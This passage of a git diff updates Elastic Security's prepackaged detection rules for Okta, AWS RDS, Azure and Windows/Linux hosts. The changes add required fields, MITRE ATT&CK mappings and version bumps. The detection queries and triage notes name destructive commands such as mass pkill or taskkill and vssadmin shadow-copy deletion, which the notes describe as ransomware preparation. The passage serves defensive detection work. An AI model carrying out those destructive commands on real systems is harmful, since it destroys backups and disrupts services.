"", "query": "event.dataset:okta.system and event.action:application.lifecycle.delete\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -28,9 +47,27 @@ "Okta", "Continuous Monitoring", "SecOps", - "Monitoring" + "Monitoring", + "Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_application.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_modify_okta_application.json similarity index 62% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_application.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_modify_okta_application.json index 3c0524749eed9..5bc28de21abfe 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_application.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_modify_okta_application.json @@ -13,15 +13,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Modify an Okta Application", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:application.lifecycle.update\n", "references": [ "https://help.okta.com/en/prod/Content/Topics/Apps/Apps_Apps.htm", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "c74fd275-ab2c-4d49-8890-e2943fa65c09", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -29,9 +48,21 @@ "Okta", "Continuous Monitoring", "SecOps", - "Monitoring" + "Monitoring", + "Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_possible_okta_dos_attack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_possible_okta_dos_attack.json index 7372eb0e0286b..26eebdce60aec 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_possible_okta_dos_attack.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_possible_okta_dos_attack.json @@ -10,14 +10,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Possible Okta DoS Attack", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:(application.integration.rate_limit_exceeded or system.org.rate_limit.warning or system.org.rate_limit.violation or core.concurrency.org.limit.violation)\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e6e3ecff-03dd-48ec-acbd-54a04de10c68", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_process_kill_threshold.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_process_kill_threshold.json new file mode 100644 index 0000000000000..4babca6c1368f --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_process_kill_threshold.json @@ -0,0 +1,72 @@ +{ + "author": [ + "Elastic" + ], + "description": "This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "High Number of Process Terminations", + "note": "## Triage and analysis\n\n### Investigating High Number of Process Terminations\n\nAttackers can kill processes for a variety of purposes. For example, they can kill process associated\nwith business applications and databases to release the lock on files used by these applications so they may be\nencrypted,or stop security and backup solutions, etc.\n\nThis rule identifies a high number (10) of process terminations via pkill from the same\nhost within a short time period.\n\n#### Possible investigation steps\n\nDetection alerts from this rule indicate High Number of Process Terminations from the same host\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the process termination(s) via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the process killed during the malicious execution\n - Identify imment threat to the system from the process killed\n - Take necessary incident response actions to respawn necessary process\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system or restore it to the operational state.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look\nfor ransomware preparation and execution activities.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", + "query": "event.category:process and event.type:start and process.name:\"pkill\" and process.args:\"-f\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "67f8443a-4ff3-4a70-916d-3cfa3ae9f02b", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Linux", + "Threat Detection", + "Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "threshold": { + "field": [ + "host.id" + ], + "value": 10 + }, + "type": "threshold", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_group_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_group_deletion.json index 5f13c9ca2ecb8..d508b926a7926 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_group_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_group_deletion.json @@ -16,13 +16,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS RDS Security Group Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:DeleteDBSecurityGroup and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBSecurityGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "863cdf31-7fd3-41cf-a185-681237ea277b", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -51,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_deletion.json index 64c28c5033d9f..6fce76388e209 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_deletion.json @@ -15,8 +15,8 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Deletion of RDS Instance or Cluster", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:(DeleteDBCluster or DeleteGlobalCluster or DeleteDBInstance) \nand event.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:(DeleteDBCluster or DeleteGlobalCluster or DeleteDBInstance)\nand event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/delete-db-cluster.html", "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html", @@ -25,8 +25,38 @@ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/delete-db-instance.html", "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBInstance.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "9055ece6-2689-4224-a0e0-b04881e1f8ad", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -55,5 +85,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_stoppage.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_stoppage.json index e35a0c145ac59..98ed1be474e2a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_stoppage.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_stoppage.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS RDS Instance/Cluster Stoppage", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:(StopDBCluster or StopDBInstance) and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/stop-db-cluster.html", @@ -23,8 +23,38 @@ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/stop-db-instance.html", "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_StopDBInstance.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_resource_group_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_resource_group_deletion.json index 16153a832dcb9..d9df9894361a5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_resource_group_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_resource_group_deletion.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Resource Group Deletion", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.RESOURCES/SUBSCRIPTIONS/RESOURCEGROUPS/DELETE\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-portal" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "bb4fe8d2-7ae2-475c-8b5d-55b449e4264f", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -71,5 +96,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_stop_process_service_threshold.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_stop_process_service_threshold.json index 36a30f51beab0..ce6abad33f97e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_stop_process_service_threshold.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_stop_process_service_threshold.json @@ -14,6 +14,28 @@ "name": "High Number of Process and/or Service Terminations", "note": "## Triage and analysis\n\n### Investigating High Number of Process and/or Service Terminations\n\nAttackers can stop services and kill processes for a variety of purposes. For example, they can stop services associated\nwith business applications and databases to release the lock on files used by these applications so they may be encrypted,\nor stop security and backup solutions, etc.\n\nThis rule identifies a high number (10) of service and/or process terminations (stop, delete, or suspend) from the same\nhost within a short time period.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system or restore it to the operational state.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look\nfor ransomware preparation and execution activities.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "event.category:process and event.type:start and process.name:(net.exe or sc.exe or taskkill.exe) and\n process.args:(stop or pause or delete or \"/PID\" or \"/IM\" or \"/T\" or \"/F\" or \"/t\" or \"/f\" or \"/im\" or \"/pid\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "035889c4-2686-4583-a7df-67f89c292f2c", "severity": "medium", @@ -48,5 +70,5 @@ "value": 10 }, "type": "threshold", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_virtual_network_device_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_virtual_network_device_modified.json index bf988e5dd1e0c..538f4dd0e4b4f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_virtual_network_device_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_virtual_network_device_modified.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Virtual Network Device Modified or Deleted", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:(\"MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/WRITE\" or\n\"MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/DELETE\" or \"MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE\" or\n\"MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION\" or \"MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE\" or\n\"MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/DELETE\" or \"MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/WRITE\" or\n\"MICROSOFT.NETWORK/VIRTUALHUBS/DELETE\" or \"MICROSOFT.NETWORK/VIRTUALHUBS/WRITE\" or\n\"MICROSOFT.NETWORK/VIRTUALROUTERS/WRITE\" or \"MICROSOFT.NETWORK/VIRTUALROUTERS/DELETE\") and \nevent.outcome:(Success or success)\n", + "note": "", + "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:(\"MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/WRITE\" or\n\"MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/DELETE\" or \"MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE\" or\n\"MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION\" or \"MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE\" or\n\"MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/DELETE\" or \"MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/WRITE\" or\n\"MICROSOFT.NETWORK/VIRTUALHUBS/DELETE\" or \"MICROSOFT.NETWORK/VIRTUALHUBS/WRITE\" or\n\"MICROSOFT.NETWORK/VIRTUALROUTERS/WRITE\" or \"MICROSOFT.NETWORK/VIRTUALROUTERS/DELETE\") and\nevent.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "573f6e7a-7acf-4bcd-ad42-c4969124d3c0", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -28,7 +53,8 @@ "Azure", "Continuous Monitoring", "SecOps", - "Network Security" + "Network Security", + "Impact" ], "threat": [ { @@ -43,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.json index 6e53615324f82..6a42b0dde861c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Volume Shadow Copy Deleted or Resized via VssAdmin", - "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deleted or Resized via VssAdmin\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes\nthat can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow\nCopies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow\ncopies worth monitoring.\n\nThis rule monitors the execution of Vssadmin.exe to either delete or resize shadow copies.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule may produce benign true positives (B-TPs). If this activity is expected and noisy in your\nenvironment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deleted or Resized via VssAdmin\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes\nthat can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow\nCopies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow\ncopies worth monitoring.\n\nThis rule monitors the execution of Vssadmin.exe to either delete or resize shadow copies.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule may produce benign true positives (B-TPs). If this activity is expected and noisy in your\nenvironment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\")\n and (process.name : \"vssadmin.exe\" or process.pe.original_file_name == \"VSSADMIN.EXE\") and\n process.args in (\"delete\", \"resize\") and process.args : \"shadows*\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -43,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 13 + "version": 15 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_powershell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_powershell.json index 424029ea8cb11..12bf2d02aca43 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_powershell.json +++ 